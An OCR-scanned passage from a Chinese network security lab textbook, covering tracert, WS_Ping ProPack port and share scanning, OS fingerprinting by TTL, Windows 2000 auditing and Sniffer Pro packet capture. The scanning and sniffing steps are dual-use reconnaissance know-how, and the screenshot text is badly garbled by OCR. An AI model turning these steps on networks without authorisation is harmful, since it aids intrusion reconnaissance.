图 9.32 反映 了 从 本 机 到 sohu 站 点 所 经 过 的 路 由 信息 ,客观 地 显示 出 网 络 拓扑 结构 , 黑 


(4) 输入 tracert yahoo. com, 按 Enter 键 确认 ,观察 结果 。 


G) 登录 到 Linux 系统 中 ,运行 tracertroute 命令 ,同样 可 以 看 出 返 


| 以 通过 这 一 命令 对 被 攻击 方 的 网 络 状况 有 一 个 初步 的 了 解 ,为 实施 下 一 步 攻 击 黄 定 基 
同时 ,安全 管理 人 员 也 可 以 借助 这 一 工具 探查 、 分 析 网 络 中 的 重要 路 由 节点 。 


回 的 路 由 信息 。 


通过 使 用 tracert 命令 可 以 检测 系统 的 拓扑 结构 ,这 样 就 可 以 在 黑客 攻击 之 前 有 针对 性 
地 制定 安全 策略 ,实施 防火 墙 架构 ,同时 也 为 侦查 网 络 故障 提供 路 由 级 报告 。 


实验 五 ”使 用 WS_Ping Propack 进行 网 络 检测 和 扫描 


实验 目的 : 掌握 Ping Pro 检测 扫描 的 基本 方法 。 


(1) 获得 Ping Pro 安装 包 文件 ,然后 进行 本 地 安装 向 导 , 如 图 9. 33 所 示 。 


"roPack Install 


(C Remove pro a WEST ETUDES 


Ee 


iPSWITCH'| 


E Ez efe M TETTE 
图 9.33 安装 向 导 


(2) 单 击 Continue 按钮 ,确认 安装 ,打开 安装 路 径 , 如 图 9. 34 所 示 。 


(3) 输入 安装 目录 , 单 击 OK 按钮 ,如 图 9. 35 所 示 。 
(4) 选择 安装 栏目 组 名 称 , 单 击 OK 按钮 后 安装 成 功 。 


d ED 19:07 


G) 执行 “开始 ”一 “程序 ”>WS_PingProPack 命令 ,打开 Ping Pro, 如 图 9. 36 所 示 。 

(60 选取 Ping 标签 ,并 在 Host Name or IP 处 输入 192. 168. 0. x x 为 任意 IP 地 址 ) ,如 
图 9.37 所 示 。 
(7) 选取 Scan 标签 ,选中 Scan Ports 复 选 框 ,检测 熟知 的 端口 号 ,如 图 9. 38 所 示 。 


How 
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PROGRAM files directory 


NN 
[cWiogemFeswWSPwoPR Ceme | 


IPSWITCH" 


E uid em ll WA WS PingProPackInstal — wspng d MED 190 
图 9.34 安装 路 径 


| WS_Ping ProPack Install 


Program Manager Group 


the: ofthe. Mi 
Trumpet 
[ws-Pina ProPack z] Cancel 


IPSWITCH" 


arenal W ws PicProPackInstal — —Jwspng | 


图 9.35 输入 安装 栏目 组 


IWindows 2000 S 


GI cen 
图 9.36 安装 成 功 


[DJ 


| Se 1 smr | mines | Throughput | About 
| Time | wm Ping | TraceRoute | Lookup | Finger | Whois | LA 


Most. Nane or IP E ort Vief Help | zie [Strt] 


5 packets sent: 5 packets received: 0% lost 


192. 168.0. 100 5/5000/58/1; Start tine OVOUOM 19 

32. 168. 0. 100 round trip successful 
round trip Successful 
round trip successful 
round trip successful 
round trip successful 


wm. O, Maximus: O, Average 


Ping is used to determine F a network device is reachable. 


aj SSA] SE fa soe E 


19:18 


图 9.37 Ping 标签 运行 结果 


Info | Time | Hut | Ping [aa a NE 
ES 


Quote an ] sme | Finet | Throughput | About 
Start harese fie [es p | às | es [i] 
End Address: FE Er lov Network 厂 
Timeout: P0 sean exit at 192.168.0.254 
|i92. 168.000.003 FTP SWTP Er FILE 


[V Resolve Nnes 
F Echo 


E 


E 
333 
" 


Scan for devices in your network. 


3ess[| e ma cem 00000 [aes eroe PAE :909 
图 9.38 Scan 标签 运行 结果 
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(8) 选取 WinNet 标签 ,在 Network Items 列表 框 中 选取 domains, 然 后 单 击 Start 按 
钮 ,结束 以 后 文本 框 中 将 列 出 同一 网 络 中 的 域 / 工 作 组 信息 ,如 图 9. 39 所 示 。 


Ele Edt Help 


Info | rime | mm Ping | TraceRoute | Lookup | Finger | Whois | DA 
Quote | Sean smr Tine — | Throughput | About 


p -—-— D 3 Enn 


Obtain information on the WinNet network domains, hosts and workstations. 


am eSa cer 000 [Were — 
图 9.39 域 /工作 组 信息 运行 结 


(9) 在 Network Items 列表 框 中 选取 shares, 可 以 扫描 到 共享 信息 ,如 图 9. 40 所 示 。 


Ele Edt Help 
Info | Time | MeL | Ping | TraceRoute | Lookup | Finger | weis | DA 
Quote | Sca smp Filet | Throughput | About 


Network Its [hares E Hap | aes [Stat] 


[Obtain information on the WinNet network domains, hosts and workstations, 


EERIE [avre -— E a 


图 9. 40 共享 信息 运行 结果 


(10) 选取 Info 标签 ,输入 IP 地 址 或 主机 名 都 可 以 扫描 出 IP 地 址 或 主机 名 。 

(11) 选取 HTML 标签 ,在 URL 栏 内 输入 一 网 址 可 以 显示 其 源 代码 。 

实验 总 结 : 

Ping Pro 作为 攻击 者 常用 的 扫描 工具 ,提供 了 常用 的 网 络 扫描 功能 。 对 于 网 络 安全 审 
计 人 员 , 它 可 以 在 图 形 方式 下 实现 大 多 数 net 命令 行程 序 功能 ,为 网 络 的 管理 提供 了 一 定 的 
方便 ; 对 网 络 中 的 用 户 共享 进行 检测 ,及 时 发 现 问题 并 加 以 防范 。 


实验 六 用 ping 和 tracert 来 判断 网 络 操作 系统 类 型 


实验 名 称 : 用 ping 和 tracert 来 判断 网 络 操作 系统 类 型 。 

实验 目的 : 用 ping 和 tracert 来 判断 网 络 操作 系统 类 型 。 

实验 准备 : 安装 Windows 2000 操作 系统 环境 。 

ping 命令 最 主要 的 就 是 检测 目标 主机 是 不 是 可 连通 。ping 程序 实际 就 是 发 送 一 个 
ICMP 回 显 请 求 报 文 给 目的 主机 ,并 等 待 回 显 的 ICMP 应 答 。 然 后 打印 出 回 显 的 报 文 。 
ping 不 通 一 个 地 址 ,并 不 一 定 表示 这 个 IP 不 存在 或 者 没有 连接 在 网 络 上 ,因为 对 方 主机 可 
能 做 了 限制 ,例如 安装 了 防火 墙 ,因此 ping 不 通 并 不 表示 不 能 使 用 FTP 或 者 Telnet 连接 。 

ping 结果 包括 字 节 数 ` 反 应 时 间 以 及 生存 时 间 。Ping 程序 通过 在 ICMP 报 文 数据 中 存 
放 发 送 请 求 的 时 间 来 计算 返回 时 间 。 当 应 答 返 回 时 ,根据 现在 时 间 减 去 报 文中 存放 的 发 送 
时 间 就 得 到 反应 时 间 了 。 生 存 时 间 (Time To Live,TTL), 本 来 就 存放 在 IP 数据 报 的 头 部 ， 
直接 就 能 够 获取 。 

tracert 是 一 个 探测 路 由 的 程序 ,可 以 看 见 IP 数据 报到 达 目 的 地 经 过 的 路 由 。 

tracert 利用 ICMP 数据 报 和 IP 数据 报头 部 中 的 TTL fi. TTL 是 一 个 IP 数据 报 的 生 
存 时 间 , 当 每 个 IP 数据 报 经 过 路 由 器 时 ,都 会 把 TTL 值 减 去 1 或 减 去 在 路 由 器 中 停留 的 时 
间 ,但 是 大 多 数 数据 报 在 路 由 器 中 停留 的 时 间 都 小 于 1s, 因 此 实际 上 就 是 在 TTL 值 减 去 1。 
这 样 ,TTL 值 就 相当 于 一 个 路 由 器 的 计数 器 。 

当 路 由 器 接收 到 一 个 TTL 为 0 或 1 的 IP 数 据 报时 ,路 由 器 就 不 再 转发 这 个 数据 了 ,而 
直接 丢弃 ,并 且 发 送 一 个 ICMP* 超 时 ”信息 给 源 主机 。tracert 程序 的 关键 就 是 回 显 的 
ICMP 报 文 的 IP 报头 的 信 源 地 址 就 是 这 个 路 由 器 的 IP 地 址 。 如 果 到 达 了 目的 主机 ,同时 
tracert 还 发 送 一 个 UDP 信息 给 目的 主机 ,并 且 选 择 一 个 很 大 的 值 作为 UDP 的 端口 ,使 主 
机 的 任何 一 个 应 用 程序 都 不 使 用 这 个 端口 。 所 以 , 当 达 到 目的 主机 时 ,UDP 模块 就 产生 一 
个 “端口 不 可 到 达 ” 的 错误 ,这 样 就 能 判断 是 否 到 达 目 的 地 。 

(1) 用 ping 命令 连接 目标 主机 

C: \>ping 211.99.199.204 

Pinging 211.99.199.204 with 32 bytes of data: 

Reply from 211.99.199.204: bytes = 32 time = 20ms TTL = 248 

Reply from 211.99.199.204: bytes = 32 time« 10ms TTL = 248 

Reply from 211.99.199.204: bytes - 32 time - 10ms TTL - 248 

Reply from 211.99.199.204: bytes = 32 time = 10ms TTL = 248 

Ping statistics for 211.99.199.204: 

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 


Approximate round trip times in milli- seconds: 


Minimum = Oms, Maximum = 20ms, Average = 10ms 


(2) 用 tracert 命令 连接 目标 主机 


C: \>tracert 211.99.199.204 
Tracing route to 211.99.199.204 over a maximum of 30 hops 


Bow 
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10ms 10ms 20ms 211.99.57.121 
10ms 10ms 10ms 202.96.13.1 
<10ms 10ms 20ms 202.96.13. 62 
20ms 10ms 10ms 210.77.139.186 
<10ms 10ms 20ms 210.77.139.170 
<10ms < 10ms 10ms 211.99.193.154 
<10ms 10ms <10ms 211.99.199.204 
Trace complete 

C: \> 


20U05U0mwvn-2 


ping 得 到 的 TTL-—248.2 了 7 个 路 由 器 ,减少 了 
(3) 用 ping 个 Wmv lh 所 示 。 


INNT\system32\cmd.enxe 


c: Vping www-sina-com 


Pinging libra.sina.con.cn [61.135.153.179] with 32 bytes of data: 


61.135.153.1 32 tine-40ns 
61. 
61. 

Reply from 61. E tine-4Uns 


Ping statistics for 61.135.153.1 
Packets: Sent = 4, Received = 4, Lost = 8 (Ax loss), 
Approximate round trip times in milli-second: 
Minimum = 4üns, Maximum = SOns, Average = 42ns 


S 


Hd 9.41 用 ping 命令 连接 目标 主机 


(4) 用 tracert 命令 连接 目标 主机 ,如 图 9. 42 所 示 


tt -com-cn [61.135.153.175] 
lover a maximum of 30 hop: 


<10 <10 ns <10 192.168.8.1 
E 58 58 61.149.112.1 
50 ns — 48 51 61.148.4.81 

E 40 se 202.188.47.17 
" 5A ms 59 202.108.46.18 
48 E 40 61.135.143.4 
48 58 48 ns 61.135.148.178 
E 40 58 61.135.153.175 


[Trace complete. 


ASI 


图 9.42 Hj tracert 命令 连接 目标 主机 


由 此 ,可 以 判断 www. sina. com 的 服务 器 可 能 是 Linux 
下 面 是 一 些 主机 的 ; 


LINUX Kernel 2.2.x &2.4.x 

ICMP 回 显 应 答 的 TTL. 字段 值 为 64; 
FreeBSD 4.1, 4.0, 3.4; 

Sun Solaris 2.5.1, 2.6, 2.7, 2.8; 
OpenBSD 2.6, 2.7, 

NetBSD 


HP UX 10.20 

ICMP 回 显 应 答 的 TTL. 字段 值 为 255; 
Windows 95/98/98SE 

Windows ME 

ICMP 回 显 应 答 的 TTL. 字段 值 为 32; 
Windows NT 

Windows 2000 

ICMP 回 显 应 答 的 TTL. 字段 值 为 128。 


实验 七 “Windows 2000 配置 启用 系统 审核 


实验 目的 ; 提高 Windows 2000 的 安全 性 。 

实验 步骤 如 下 。 

1. 审核 策略 的 设置 

CD 执行 “开始 ”一 "程序 ”管理 工具 ”一 本 地 安全 策略 ”命令 ,如 图 9. 43 所 示 。 


B 万 能 五 笔 2002 多 元 输入 法 ^ Cr 授权 
EE C [os] 
» jj ge 
^b 组 件 服务 


出 开始 | ru 图 || 三 陈 j8 的 实验 | 可] 二 训 内 容 - v. | 四] 培训 内 容 实 | auis 
图 9.43 启动 程序 


(2) 双击 “本 地 安全 策略 ”, 再 打开 “本 地 策略 ”选中 “审核 策略 ”, 如 图 9. 44 所 示 。 

CD 策略 设置 ,把 审核 账户 登录 事件 设置 为 成功, 失败”, 如 图 9. 45 所 示 。 

(4) 重新 启动 计算 机 才能 生效 。 

2. 对 文件 和 文件 夹 访问 的 审核 

首先 ,要 求 审 核 的 对 象 必须 位 于 NTFS 分 区 上 ; 其 次 ,必须 为 对 象 访问 事件 设置 审核 策 
略 。 符 合 以 上 条 件 ,就 可 以 对 特定 的 文件 或 文件 夹 进行 审核 ,并且 对 哪些 用 户 或 组 指定 哪些 
类 型 的 访问 进行 审核 。 


How 
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环 本 地 安全 设置 EC 
| se 查看 W ||e 2 | omx B e | 


村 | n 本 地 设置 

ES EL II 无 审核 无 审核 
HEISE [EI EI 无 审核 无 审核 
& CB 本 地 第 略 病 | 审 核对 象 访问 无 审核 无 审核 
COEXAXd ELE 无 审核 无 审核 
四 全 用户 权利 指派 、| 剖 审核 目录 服务 访问 无 审核 无 审核 
EE 审核 特权 使 用 无 审核 无 审核 
aA 公 名 第 略 | 审核 系统 事件 无 审核 无 审核 
59 信安 全 策略， 在 本 二] 审核 帐户 登录 事件 无 审核 xeu 
EI EE 无 审核 无 审核 

nit 到 

I I 
图 9.44 安全 设置 
HETTIYXT [Ee] 
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图 9.45 策略 设置 


CD 选择 想 要 审核 的 文件 夹 右 击 , 在 弹出 的 快捷 菜单 中 执行 “属性 ”一 “安全 ”一 “高 级 ” 
命令 ,如 图 9.46 所 示 。 
zixl 


BE “| 审核 | 所 有 者 | 
ARERORB T: 


mno... | M E) | smi oo 


Iv. 区 许 将 来 自 父系 的 可 继承 权限 传播 给 该 对 象 0) 
厂 重 轩 所 有 子 对 象 的 权限 并 允许 传播 可 继承 权限 G) 


CD | wo 


图 9.46 访问 控制 设置 


(2) 选择 "审核 ?标签 ,然后 单 击 “ 添 加 ?按钮 。 
(3) 选择 “访问 ”成 功 或 失败 ,如 图 9. 47 所 示 。 
CD 返回 到 “访问 控制 设置 ”对话 框 。 


zix] 
xz | 
gwo [eder Me Wer [F20] 
RAIO: [AxER FARR ox] 
失败 


HG: 


加 


遍历 文件 夹 /运行 文件 n g 
列 出 文件 来/ 读 取 数 据 n n 
读 取 属 性 口 n 
读 职 扩展 尾 性 n n 
包 障 文件 / 写 入 数据 El 回 
包 娃 文件 夹 /附加 数据 n B 
写 入 属性 口 [zi 
写 入 扩展 属性 口 
A e n n 
n n 
WRG E n 
更 改 权限 n n 

CHE EN 

图 9.47 审核 项 目 


默认 情况 下 ,对 父 文件 夹 所 做 的 审核 更 改 将 应 用 于 其 所 包含 的 子 文件 夹 和 文件 。 如 果 
不 想 将 父 文件 夹 所 进行 的 审核 更 改 应 用 到 当前 所 选择 的 文件 或 文件 夹 , 清 空 检查 框 “ 允 许 将 
来 自 父系 的 可 继承 审核 项 目 传播 给 该 对 象 * 即 可 ,确认 并 返回 。 

3. 对 打印 机 访问 的 审核 

要 求 必须 为 对 象 访问 事件 设置 审核 策略 ,满足 这 个 条 件 就 能 够 对 特定 的 打印 机 进行 审 
核 , 并 能 够 审核 指定 的 访问 类 型 以 及 拥有 访问 权限 的 用 户 。 

OD. 选择 “开始 ”>“ 设 置 ">“ 打 印 机 ”选项 ,添加 打印 机 ,如 图 9. 48 所 示 。 


-igxi 
| 文件 (E) RAO EEV KAA IAW WA 
| AFE- 9 - 因 | 3er cxhx Qmt|mU X A| E 
ojas 可 本 河 


该 文件 来 包含 当前 打印 机 的 有 关 
Les B as MMC 


i 
E 请 用 右键 单 击 该 打印 机 的 图 


要 安装 新 打印 机 ， 请 单 击 添加 打 
印 机 图 标 。 


选 定 项 目 可 以 查看 其 说 明 . 


Windnws 2nnn 支持 mi 
THR E 


图 9.48 添加 打印 机 
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(2) 选择 “属性 ”一 “安全 ”一 “高 级 "选项 , 单 击 “ 高 级 "按钮 ,如 图 9. 49 所 示 。 


型 号 
Microsoft Office Document Image 
Writer Driver 


等 待 时 间 :0 


[CELLS LT TA PI 


图 9.49 选择 属性 


(3) 选择 “审核 ”标签 ,然后 单 击 “ 添 加 ”按钮 。 
(4) 选择 “访问 ”成功 或 失败 ,如 图 9. 50 所 示 。 
(5) 确定 应 用 就 完成 了 。 
[al 


LE Fa 
RAHO: | 该 打印 机 及 文档 z] 


wee: 失败 


确定 取消 | 
图 9.50 访问 成 功 或 失败 


4. 审核 结果 的 查看 和 维护 
设置 了 审核 策略 和 审核 事件 后 ,审核 所 产生 的 结果 都 被 记录 到 安全 日 志 中 ,安全 日 志 记 


录 了 审核 策略 监控 的 事件 成 功 或 失败 执行 的 信息 。 使 用 事件 查看 器 可 以 查看 安全 日 志 的 内 
容 或 在 日 志 中 查找 指定 事件 的 详细 信息 。 
(1) 访问 “事件 查看 器 ”, 如 图 9.51 所 示 。 


旧事 件 查 看 器 E -— oz 
| 
日 志 应 用 程序 错误 记录 

He 。 安全 审核 记录 

E o 系统 错误 记录 
| 

图 9.51 事件 查看 器 
(2) 选择 查看 “安全 日 志 ”, 如 图 9. 52 所 示 。 

;-inixi 


[sfr | s || e 9 omen e 
村 | | 安全 日 志 1939 个 事件 


事件 查看 器 (本 地 ) 
1) 应 用 程序 日 志 
日 志 


安全 | 
5| 系统 日 志 


图 9.52 查看 安全 日 志 


(3) 查看 审核 ,如 图 9. 53 所 示 。 

5. 事件 查看 器 的 使 用 

CD 打开 “开始 ”菜单 ,执行 “程序 ”>“ 管 理工 具 ”>“ 事 件 查 看 器 ”命令 。 如 果 “ 开 始 ” 菜 单 
中 没有 “管理 工具 ”选项 , 则 进入 控制 面板 ,打开 “管理 工具 ”, 运 行 “事件 查看 器 ”, 如 图 9. 54 所 示 。 

(2) 在 “事件 查看 器 ”窗口 的 控制 台 选 择 * 安 全 日 志 ? 选 项 。 在 右边 的 窗 格 显示 日 志 条 目 
的 列表 ,以 及 每 一 条 目的 摘要 信息 ,包括 日 期 .事件 .来 源 、. 分 类 .事件 ,用户 和 计算 机 名 。 成 
功 的 事件 前 显示 一 个 钥匙 图 标 ,而 失败 的 事件 则 显示 锁 的 图 标 ,如 图 9. 55 所 示 。 
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(0x0, OxASESD) 
SsChangeNoti fyPrivilege 


HEO € FFE CFW 


取消 E 


图 9.53 查看 审核 


旧事 件 查 看 器 
mto mE |e  [Gs[m e 


Hé 。 应 用 程序 错误 记录 
He 。 安全 审核 记录 
He 。 系统 错误 记录 


图 9.54 事件 查看 器 


和 事件 查看 器 3 E] 
] 操作) | æv || e +2 0m (eS (2) G3 | 
[2205 L939 个 事件 


图 9.55 安全 日 志 


(3) 如 果 想 查看 某 一 条 目的 详细 信息 ,双击 选择 的 条 目 ; 或 选择 一 条 目 后 ,点 击 * 操 作 ” 
菜单 的 “属性 ?项 ,如 图 9. 56 所 示 。 


zixl 
SHES | 
日 期 : 2004-5-4 E: Security t 
Bd: 20:51 3o Seem H 
AMO 戌 功 审核 SD ST E] 
APU: mam 83 


服务 器 : Security 


服务 : 

主要 用 户 名 : ce 

主要 域 : WIR3 

FESE m (nen nvinmrs1 zi 


BED € FED Cem 


取消 [eif] 
图 9.56 事件 属性 
(4) 运用 “事件 查看 器 "的 查找 功能 。 确 认 控 制 树 中 当前 选 定 的 项 目 是 “安全 日 志 ”, 单 
击 “ 查 看 ”菜单 的 “查找 项。 在 查找 窗口 中 ,选择 或 输入 相应 的 条 件 , 单 击 “ 查 找 下 一 个 ” 按 
钮 ,符合 条 件 的 事件 就 会 在 “事件 查看 器 "的 事件 列表 窗 格 中 反 显 出 来 ,如 图 9. 57 所 示 。 


旧事 件 查看 器 lal xi 
| wo zm || e 9 (Grm eS ED Eb | P 
树 | RANO. | 安全 日 志 1,946 个 事件 
回 Site e 所 有 记录 人) 
| 应 用 MaN.. 2004-5-4 20:51:52 Secu 
TRE, 2004-5-4 20:51:50 Secu 
FRY RD 2004-54 20:51:50 Secu 
DESSAN 2004-5-4 20:51:36 Secu 
2004-5-4 20:51:36 Secu 
2004-5-4 20:51:29 Secu 
2004-5-4 20:51:29 — Secu 
2004-54 20:41:02 Secu 
2004-54 20:39:06 Secu 
2004-5-4 20:39:35 Secu 
2004-5-4 20:39:30 Secu 
2004-5-4 20:39:30 Secu 
2004-5-4 20:38:35 Secu 
2004-5-4 20:38:26 n 
[d 
在 日 志 中 搜索 指定 记录 [ [ 


图 9. 57 “事件 查看 器 "查找 功能 


(5) 如 果 想 在 “事件 查看 器 ”的 事件 列表 窗 格 中 只 列 出 符合 相应 条 件 的 事件 ,这 时 要 用 
到 筛选 功能 ,确认 控制 树 中 当前 选 定 的 项 目 是 “安全 日 志 ”, 点 击 " 查 看 ”一 筛选 ,如 图 9. 58 
Bim. 

(6) 更 改 日 志文 件 的 大 小 ,通过 更 改 日 志文 件 的 属性 来 实现 。 在 “事件 查看 器 ”的 控制 
树 中 选中 “安全 日 志 ” 项 , 单 击 “ 操 作 ” 菜 单 的 “属性 ”项 ,进入 “安全 日 志 属 性 ”窗口 ,在 “常规 ” 
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CIE -ox 
| #tw sm || e 5 mm | cS [3 G3 | 9 


E 
反 显 示 符 合 指定 条 件 的 记录 I [ 
图 9.58 “事件 查看 器 ”筛选 功能 


标签 页 面 上 ,可 以 对 日 志文 件 的 大 小 进行 设置 ; 当日 志文 件 达 到 最 大 尺寸 时 ,用 户 根据 需要 
可 以 有 3 种 选择 : 改写 事件 ; 改写 久 于 设 定 天 数 的 事件 和 不 改写 事件 ,如 图 9. 59 所 示 。 
axi 


[CODE MM 
BEEM: [nrw meSystes32WonfigXSechvent Evt —— 
Se 512.0 KB (524,288 FB) 

[3 0: 2004 年 2 月 15 日 21:18:25. 

修改 时 间 : 2004 年 5 月 4 日 19:07:15 

访问 时 间 :; 2004 年 5 月 4 日 19:07:15 


取消 RB 


图 9.59 “安全 日 志 属 性 ”对 话 框 


实验 八 ” 使 用 Sniffer 工具 进行 TCP/IP 分 析 


实验 目的 : 通过 实验 掌握 Sniffer 工具 的 安装 与 使 用 方法 ,理解 TCP/IP 协议 栈 中 IP, 
TCP,UDP 等 协议 的 数据 结构 ,掌握 ICMP 协议 的 类 型 和 代码 ,理解 网 络 中 数据 流 的 封包 格 
式 与 输出 字段 ,碎片 的 原理 和 重组 过 程 。 

实验 步骤 如 下 。 


任务 一 安装 Sniffer Pro 


(1) Sniffer 技术 简介 

Sniffer( 嗅 探 器 ?就 是 利用 计算 机 的 网 络 接口 截获 目的 地 为 其 他 计算 机 的 数据 报 文 的 一 种 
技术 。 该 技术 被 广泛 应 用 于 网 络 维护 和 管理 方面 , 它 接收 来 自 网 络 的 各 种 信息 ,通过 对 这 些 数 据 
的 分 析 , 网 络 管理 员 可 以 深入 了 解 网 络 当前 的 运行 状况 ,以 便 找 出 所 关心 的 网 络 中 潜在 的 问题 。 

在 正常 情况 下 ,网 络 接口 卡 读 入 一 帧 并 进行 检查 ,如果 帧 中 携带 的 目的 地 址 (这 里 的 目 
的 地 址 是 指 物理 地 址 而 非 TP 地 址 ,该 地 址 是 网 络 设备 的 唯一 性 标志 ) 和 自己 的 物理 地 址 一 
致 或 是 广播 地 址 (就 是 被 设 定 为 一 次 性 发 送 到 网 络 所 有 主机 的 特殊 地 址 , 当 目 的 地 址 为 该 地 
址 时 ,所 有 的 网 络 接口 卡 都 会 接收 该 帧 ) ,网 络 接口 卡通 过 产生 一 个 硬件 中 断 引起 操作 系统 
注意 ,然后 将 帧 中 所 包含 的 数据 传送 给 系统 进一步 处 理 ,否则 就 将 这 个 帧 丢弃 。 

如 果 网 络 中 某 个 网 络 接口 卡 设置 成 “混杂 ?状态 ,网 络 接口 卡 会 如 何 处 理 收 到 的 帧 呢 ? Sc 
际 的 情况 是 该 网 络 接口 卡 将 接收 所 有 在 网 络 中 传输 的 帧 ,无论 该 帧 是 广播 的 还 是 发 向 某 一 指 
定 地 址 的 ,这 就 形成 了 监听 。 如 果 某 一 台 主 机 被 设置 成 这 种 监听 模式 , 它 就 成 了 一 个 Sniffer。 

鉴于 Sniffer 的 工作 原理 ,如 果 一 个 数据 帧 没有 发 送 到 网 络 接口 卡 上 ,那么 将 无 法 监听 
到 该 帧 。 所 以 Sniffer 所 能 监听 到 的 信息 仅 限于 在 同一 物理 网 络 内 传送 的 数据 ,在 使 用 了 交 
换 ( 路 由 ) 设 备 的 网 络 中 ,由 于 其 数据 是 根据 目的 地 址 进行 分 发 的 ,单个 的 网 络 接口 卡 将 无 法 
监听 到 所 有 正在 传输 的 信息 

(2) 双击 安装 :可 执行 程序 ， 开始 运行 安装 程序 ,如 图 9. 60 所 示 。 


Š Sniffer Portable 4.7.5 - InstallShield Wizard E 
Extracting Files y 
The contents of this package are being extracted. c 
SaF 


Dieses wok vir Ehe instalshield Wizard etcts th Hie needed to stal sniffar 
Portable 4.7.5 on your computer. This may take a few moments. 


Reading contents of package... 


Installshield 


aa EE em | 


图 9.60 安装 可 执行 程序 


单 击 Next 按钮 继续 安装 ,如 图 9. 61 所 示 。 
3 


Snilfer Pro Setup is preparing the InstallShield[F]] 
Wizad which M aude yod rough the est of Ihe 
ZZ setup process. Please 


99 % 
图 9.61 安装 进度 
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按 提示 填写 对 话 框 ,如 图 9. 62 所 示 。 


User Information E E: 
Please enter your name and the name of the company for whom 
you work. 


cees | 
图 9.62 填写 对 话 框 


填 完 后 单 击 Next 按钮 ,选择 安装 路 径 , 如 图 9. 63 所 示 。 
Choose Destination Location E xj 
Setup will install Sriffer Pro in the following folder. 
To install to this folder, cick Next. 
To psal to a ifort folder cick: Brows and select ano 


You can choose nol to install Sniffer Pro by clicking Cancel to 
exi Setup. 


r Destination Folder 


G:\Program Files\NAI\SnifeNT Browse.. || 
[ Er] 
图 9.63 安装 路 径 


(3) 安装 过 程 中 ,要 填写 一 些 注册 信息 ,可 以 简要 填写 ,注意 软件 的 序列 号 要 填写 正确 ， 
如 图 9. 64 和 图 9. 65 所 示 。 


E 
Inter your nane and information * - Indicates a 

A ane pa B M— 
fs ho oo 

* Business pese 


* [BA154-2558r-255T9-2LASH 
* Customer [Education E 


* Emil EEC ZEND 


E—70[T-5 0 )| 取消 
图 9.64 填写 注册 信息 (1) 


xi 
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E DH 
"meus OOOO S 
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Intl. Area Code Number Ext. 
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mw | 


图 9.65 填写 注册 信息 (2) 


(4) 安装 即将 结束 时 ,选择 接 入 Internet 的 方式 ,可 以 根据 实际 情况 选取 ,如 图 9. 66 和 
图 9. 67 所 示 。 


IA Sniffer Pro User Registration xi 


CITEIPLSES] If yeu are connecting to the Internet through 
rire, ALIF dial-up networking, you may wish to connect now. 


If you are connecting over a local area network, you 
may need to connect through a proxy. Please consult 
your system administrator. 


If ycu ere unable to connect to the Internet, your 
registration information can be printed and saved. 


G Birect Connection to the Internet 
C Connection to the Internet through a Proxy 


Configure | 


C Hot connected to network or dial-up. 
Print & fax option. 


Hg] xm | 


图 9.66 选择 接 入 Internet 的 方式 


Setup Complete 


Setup has finished copying files to your computer. 


Belore you can use the program, you must restart Windows or 
your computer. 


G ies. | want to restart my computer now? 
C. No,I wil restart my computer later. 


Remove anp disks from their drives, and then click Finish to 
complete setup. 


图 9.67 安装 结束 


How 
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(5) 安装 成 功 后 ,重新 启动 计算 机 。 
重新 启动 计算 机 后 ,就 可 以 进入 软件 的 开始 界面 ,此 时 从 File 菜单 选择 Log On, 此 时 
Sniffer 开始 工作 ,如 图 9. 68 所 示 。 


lm 


=iojxi 
Eje Montor Capture Display Toos Database Window Help 
Open... Ctro 


图 9.68 启动 Sniffer 


任务 二 捕获 数据 包 


A) 选中 Monitor 菜单 下 的 Matrix, 此 时 可 以 看 到 网 络 中 的 Traffic Map, 如 图 9. 69 
所 示 o 


- Sniffer - Local, Ethernet (Line speed at 100 Mbps) - [Matrix : 34 statio PISIS 
ifj Ele | Montor Capture Display Tools Database Window Help lei xl 
| »| 1 Dashboard 
Host Table 
ET e | 
Application Response Time 
History Samples Traffic Map 
Protocol Distributicn 
Global Statistics 


mart Sereen: 


Show matrix & s 次 | [ 元 


图 9. 69 选择 Matrix 


(2) 图 9.70 显示 了 网 络 中 的 Traffic Map 视图 。 在 左下 角 可 以 通过 单 击 MAC,IP 或 
IPX 使 Traffic Map 视图 显示 相应 主机 的 MAC IP 或 IPX 地 址 。 图 9. 70 中 显示 的 是 网 络 
中 主机 的 IP 地 址 ,每 条 连 线 表 明 两 台 主 机 间 的 通信 。 


~ Sniffer - Local, Ethernet (Line speed at 100 Mbps) — rix PIE: 
i) Ele Montor Capture Display Tocs Database Window Help NETTES 


p| n| mil) 区 | [res 
zB &lc| &|sslzz| ens ei 2| e| e 


Traffic Map 


For Help, press F1 & 4 2 


图 9.70 查看 Matrix 视图 


(3) 在 Capture 菜单 中 选中 Define Filter, 如 图 9.71 所 示 


Sniffer - Local, Ethernet (Line speed at 100 Mbps). " EISE) 
Montor | Capture Display Tools Database Window wS =l8) xj 


Y 
X| 
7 
[5i 


Define fiter & s en 


图 9.71 选中 Define Filter 


(4) 弹出 Define Filter 选项 框 后 ,在 Advanced 选项 中 ,选中 IP, 从 而 定义 要 捕获 的 数据 
包 类 型 ,如 图 9. 72 所 示 。 

(5) 回 到 Traffic Map 视图 中 ,用 鼠标 选中 要 捕获 的 主机 的 IP 地 址 。 选 中 后 ,主机 地 址 
会 以 白 底 高 亮 显示 。 此 时 , 右 击 选中 Capture, Sniffer 则 开始 捕获 指定 IP 地 址 的 主机 的 数 
据 包 ,如 图 9.73 所 示 。 
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[Define Filter - Capture. aixi 
Summary | Adress | Data Pattern Advanced | Buffer | Settings For 
CY IB m ES 
DY Im sm 
由 -万 可 IEEP802.11 
s RY I 
DY r MP 
CY rw E^ 
sOy" rm 
CF 
CY LOOPBACE wi 
Packet Size Packet Type 
Ru s FT 
Cac Error 
AL sizes Tabber 
"ET 


图 9.72 捕获 的 数据 包 类 型 


可 

Y Ele Montor Saphre Display Took Database Widow Hop =li xi 
»[ uf mheil] [[puua a 

elul slal esu zril enr] zz] el Gl 

[3 Traffic Map. 


Hide Select Nodes 
Zoom 


Pause Update 
Refresh 


[89.73 回 到 Traffic Map 视图 


(6) 开始 捕获 后 ,通过 单 击 工具 栏 中 的 Capture Panel 看 到 提包 的 情况 ,图 9.74 中 显示 


出 packet 的 数量 


Ê Eie Montor Capture Display Tools Database Window Help IIS] 


+| u| ajaja] &[[pzss ——— z] 
mE [5| Sss[zx| eo [Ea | en 


2] ẹj & 


[Capture Panel 


Show capture panel & de 2 


图 9.74 提包 的 情况 


(7) 从 Capture Panel 中 看 到 捕获 的 数据 包 已 达到 一 定数 量 后 ,停止 捕获 , 单 击 


